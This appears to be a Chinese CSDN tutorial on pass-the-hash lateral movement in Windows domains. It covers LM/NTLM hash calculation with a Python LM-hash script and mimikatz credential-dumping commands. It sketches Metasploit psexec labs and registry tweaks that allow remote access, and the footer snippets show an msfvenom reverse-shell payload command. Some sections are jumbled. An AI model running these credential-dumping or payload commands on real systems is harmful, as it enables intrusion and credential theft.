域渗透-横向移动(PTH)

最新推荐文章于 2022-04-13 17:21:25 发布
最新推荐文章于 2022-04-13 17:21:25 发布
阅读量264 收藏
点赞数
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58606546/article/details/121434932
版权

一:Windows本地认证

***基础知识***

  • Windows内部是不保存明文密码的,只保存密码的hash。
  • 本机用户的密码hash是放在本地的SAM文件 里面,域内用户的密码hash是存在域控的NTDS.DIT文件里面。
  • SAM文件位置:%SystemRoot%\system32\config\sam
  • 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。

***密码格式***

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

其中AAD3B435B51404EEAAD3B435B51404EE是LM Hash而31D6CFE0D16AE931B73C59D7E0C089C0是NTLM Hash

1.1:LM HASH

全称是:LAN Manager Hash, windows最早用的加密算法,由IBM设计。

***LM Hash计算***

  1. 用户的密码转换为大写,密码转换为16进制字符串,不足14字节将会用0来再后面补全。
  2. 密码的16进制字符串被分成两个7byte部分。每部分转换成比特流,并且长度位56bit,长度不足使用0在左边补齐长度
  1. 再分7bit为一组,每组末尾加0,再组成一组。
  2. 上步骤得到的二组,分别作为key 为 “KGS!@#$%”进行DES加密

从Windows Vista 和 Windows Server 2008开始,默认情况下只存储NTLM Hash,LM Hash将不再存在。

如果空密码或者不储蓄LM Hash的话,一般抓到的LM Hash是AAD3B435B51404EEAAD3B435B51404EE(win7)这里的LM Hash并没有价值。

1.2:NTLM HASH

为了解决LM加密和身份验证方案中固有的安全弱点,Microsoft 于1993年在Windows NT 3.1中引入了NTLM协议。

***系统版本对LM和NTLM的支持***

2000

XP

2003

Vista

Win7

2008

Win8

2012

LM

X

X

X

NTLM

X

X

X

X

X

X

X

X

注:X:当密码超过14位时使用的加密方式 X:系统默认使用的加密方式

  1. 将加密后的两组拼接在一起,得到最终LM HASH值。 
    #coding=utf-8
import re
import binascii
from pyDes import *
def DesEncrypt(str, Des_Key):
    k = des(binascii.a2b_hex(Des_Key), ECB, pad=None)
    EncryptStr = k.encrypt(str)
    return binascii.b2a_hex(EncryptStr)

def group_just(length,text):
    # text 00110001001100100011001100110100001101010011011000000000
    text_area = re.findall(r'.{%d}' % int(length), text) # ['0011000', '1001100', '1000110', '0110011', '0100001', '1010100', '1101100', '0000000']
    text_area_padding = [i + '0' for i in text_area] #['00110000', '10011000', '10001100', '01100110', '01000010', '10101000', '11011000', '00000000']
    hex_str = ''.join(text_area_padding) # 0011000010011000100011000110011001000010101010001101100000000000
    hex_int = hex(int(hex_str, 2))[2:].rstrip("L") #30988c6642a8d800
    if hex_int == '0':
        hex_int = '0000000000000000'
    return hex_int

def lm_hash(password):
    # 1. 用户的密码转换为大写,密码转换为16进制字符串,不足14字节将会用0来再后面补全。
    pass_hex = password.upper().encode("hex").ljust(28,'0') #3132333435360000000000000000
    print(pass_hex) 
    # 2. 密码的16进制字符串被分成两个7byte部分。每部分转换成比特流,并且长度位56bit,长度不足使用0在左边补齐长度
    left_str = pass_hex[:14] #31323334353600
    right_str = pass_hex[14:] #00000000000000
    left_stream = bin(int(left_str, 16)).lstrip('0b').rjust(56, '0') # 00110001001100100011001100110100001101010011011000000000
    right_stream = bin(int(right_str, 16)).lstrip('0b').rjust(56, '0') # 00000000000000000000000000000000000000000000000000000000
    # 3. 再分7bit为一组,每组末尾加0,再组成一组
    left_stream = group_just(7,left_stream) # 30988c6642a8d800
    right_stream = group_just(7,right_stream) # 0000000000000000
    # 4. 上步骤得到的二组,分别作为key 为 "KGS!@#$%"进行DES加密。
    left_lm = DesEncrypt('KGS!@#$%',left_stream) #44efce164ab921ca
    right_lm = DesEncrypt('KGS!@#$%',right_stream) # aad3b435b51404ee
    # 5. 将加密后的两组拼接在一起,得到最终LM HASH值。
    return left_lm + right_lm

if __name__ == '__main__':
    hash = lm_hash("123456")

    ***加密算法漏洞***

  2. 首先,密码长度最大只能为14个字符
  3. 密码不区分大小写。在生成哈希值之前,所有密码都将转换为大写
  4. 查看我们的加密过程,就可以看到使用的是分组的DES,如果密码强度是小于7位,那么第二个分组加密后的结果肯定是aad3b435b51404ee,如果我们看到lm hash的结尾是aad3b435b51404ee,就可以很轻易的发现密码强度少于7位
  5. 一个14个字符的密码分成7 + 7个字符,并且分别为这两个半部分计算哈希值。这种计算哈希值的方式使破解难度成倍增加,因为攻击者需要将7个字符(而不是14个字符)强制暴力破解。这使得14个字符的密码的有效强度等于,或者是7个字符的密码的两倍,该密码的复杂度明显低于14个字符的密码的理论强度。
  6. Des密码强度不高

从Windows Vista 和 Windows Server 2008开始,默认情况下只存储NTLM Hash,LM Hash将不再存在。

如果空密码或者不储蓄LM Hash的话,一般抓到的LM Hash是AAD3B435B51404EEAAD3B435B51404EE(win7)这里的LM Hash并没有价值。

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
laosec:1000:aad3b435b51404eeaad3b435b51404ee:4ed9fa78b52edf56286dc7fac36d5742:::

***抓取Win7 NTLM HASH***

mimikatz
privilege::debug
sekurlsa::logonpasswords

***NTML HASH计算***

  1. 先将用户密码转换为十六进制格式。
  2. 将十六进制格式的密码进行Unicode编码。

二:Windows网络认证

  1. 使用MD4摘要算法对Unicode编码数据进行Hash计算。 
    admin -> hex(16进制编码) = 61646d696e
61646d696e -> Unicode = 610064006d0069006e00
610064006d0069006e00 -> MD4 = 209c6174da490caeb422f3fa5a7ae634

    1.3:本地认证流程

    Windows Logon Process

    即 winlogon.exe,是Windows NT 用户登陆程序,用于管理用户登录和退出。

    LSASS

    本地安全认证子系统服务,用于微软Windows系统的安全机制。负责用户在本地验证或远程登陆时验证用户身份,管理用户密码变更,并产生访问日志。

    ***整体流程***

  2. 开机
  3. winlogon.exe显示输入用户名密码的图形化页面
  4. 用户输入用户名密码,winlogon.exe进程将输入信息交付给lsass.exe进程
  5. lsass.exe将密码加密为NTLM Hash,并与本地SAM数据库中的NTLM Hash进行比较
  6. 如果相同,则认证通过 logonpasswords

2.1:实验1:MSF进行PTH攻击

步骤一:在已经获取的Meterpreter shell下抓取NTML HASH

 步骤二:调用psexec模块,设置好选项进行登录

 实验结果:

***实验问题***

1:靶机Win7

1)共享服务不允许远程访问

将注册表中LocalAccountTokenFilterPolicy的值更改为1,如果没有该文件,直接新建一个(DWORD32位)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

2:靶机Winxp

1)连接拒绝

开启Windows XP 的445端口和Server服务

2)登陆失败

检测SMBPass的值是否正确.依次打开本地计算机策略 - >计算机配置 - > Windows设置 - >安全设置 - >本地策略 - >安全选项修改网络访问:本地帐户的共享和安全模式经典 - 本地用户身份验证

***疑问解决***

SMB协议是Windows网络中用来存取远程文件的通讯协议

2.2:实验2:Mimikatz进行PTH攻击

一年一更
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PTH横向移动
网络安全。
02-24 4635
0x01 简介 PTH全称“pass the hash”,即hash传递。PTH通过smb服务进行,走445端口。 0x02 通过PTH横向移动 一、通过cobaltstrike进行PTH 1、在已上线机器中直接dir访问目标系统C盘,提示没权限。 beacon> shell dir \192.168.3.123\c$ 2、此处使用先前已获取的hash对目标administrator用户...
渗透利用WIMC进行PTH攻击
Longwaer
01-20 888
学习掌握windows自带WIMC,更好的在内网环境中进行信息收集等操作。
【基础篇】————28、横向渗透
Fly_鹏程万里
05-27 2758
0x00 端口渗透 端口扫描 端口的指纹信息(版本信息) 端口所对应运行的服务 常见的默认端口号 .尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 端口溢出 smb ms08067 ms17010 ms11058 ... apacheftp... 常见的默认端口 1、web类(web漏洞/敏感目录) 第三方通用组...
buu Crypto学习记录(18) Windows系统密码
EMsheep的博客
03-12 770
题目链接:https://buuoj.cn/challenges#Windows%E7%B3%BB%E7%BB%9F%E5%AF%86%E7%A0%81 题目用文本可以看到 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ctf:1002:06af9108f2e1fecf144e2e8adef09efd:a7fcb22a88038f35a8f39d503e7f0062::: Gues
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
rfb-face-mask.pth
08-09
面部表情识别模型权重 https://github.com/Whiffe/PyTorch-Facial-Expression-Recognition
vox-cpk.pth.tar
09-16
https://gitee.com/nbodyfun/Real_Time_Image_Animation
exp-schp-201908301523-atr.pth
04-16
Self-Correction-Human-Parsing SCHP models exp-schp-201908301523-atr.pth
pre_efficientnetv2-s.pth
07-31
pre_efficientnetv2-s.pth
MSF使用总结
qq_44657899的博客
09-25 4058
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
凭据传递攻击(Path The Hash)
痴人说梦梦中人
01-29 3790
一、PTH简介        哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。 二、ColbaltStrike实现PTH 获取hash
Windows中的用户和组以及用户密码处理
墨鱼菜鸡
09-03 307
目录 用户帐户 Windows 默认账户 Windows内置用户账户 查看、创建和删除账户 组账户 内置组账户 组的查看、创建和删除 Windows中对用户密码的处理 LM-hash NTLM-hash 哈希传递攻击(Pass-the-Hash,PtH) MSF进行哈希传递攻击Pt...
渗透测试之攻击Windows认证
Blood_Pupil的博客
08-31 505
用户凭证收集 Hash NTLM + Kerbose PTH + compmgmt.msc
Windows系统密码抓取与防护
qq_43590351的博客
09-10 1499
Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用 NTLM Hash(MD4加密) 真正是用户密码的哈希值 Windows操作系统中的密码一般由两部分组成: 一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下: Username:RID:LM-Ha
内网渗透横向移动
hackzkaq的博客
11-18 545
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 hash 介绍 全在环境中,用户信息存储在控的ntds.dit(C:\Windows\NTDS\NTDS.dit)中; 非环境也就是在工作组环境中,当前主机用户的密码信息存储着在sam文件(C:\Windows\System32\config\SAM)。 Windows操作系统通常使用两种方法(LM和NTLM)对用户的明文密码进行加密处理。 LM只能存储小于等于14个字符的密码hash 如果密码大于14个,windows就自动使用NTLM
AD渗透 | PTH&PTK哈希传递攻击手法
m0_57221101的博客
04-13 1129
AD渗透的第二篇,托更一下Kerberos协议的分析文章,等到攻击手法研究明白了,再把协议分析放上来,防止像那些理解不明不白的人写的东西一样祸害人。 发生情况 在高版本的windows server下账号密码不再以明文的方式保存,转而以hash的形式储存,但是假如我们在攻击的时候抓取到了用户hash也可以直接用hash来直接通过验证,模拟用户登录 原理 由于验证原理的问题密码是在本地计算成hash,然后使用hash加密时间戳作为pre-Authention-data来上传,因此如果我们使用自己的脚
[buuctf]crypto刷题学习记录(1-22)
hyxyan的博客
08-27 5557
一、MD5 打开题目看到 e00cf25ad42683b3df678c61f42c6bda 直接https://www.cmd5.com/解密可得flag{admin1} 二、Url编码 打开题目看到 %66%6c%61%67%7b%61%6e%64%20%31%3d%31%7d 直接解码得flag{and 1=1} 三、看我回旋踢 打开题目看到 synt{5pq1004q-86n5-46q8-o720-oro5on0417r1} 像凯撒密码形式,直接解密得flag{5cd1004
Meterpreter提权详解
子曰小玖的博客
08-08 3179
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windo...
6_hp-karaoke-uvr.pth
最新发布
01-30
6_hp-karaoke-uvr.pth 是一个文件名,它代表了一种特定的文件格式。6_hp-karaoke-uvr.pth 文件可能是一个经过压缩或编码的音频文件,用于卡拉OK或歌曲演唱的目的。 .pth 是文件扩展名的一种常见形式,通常会提示该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值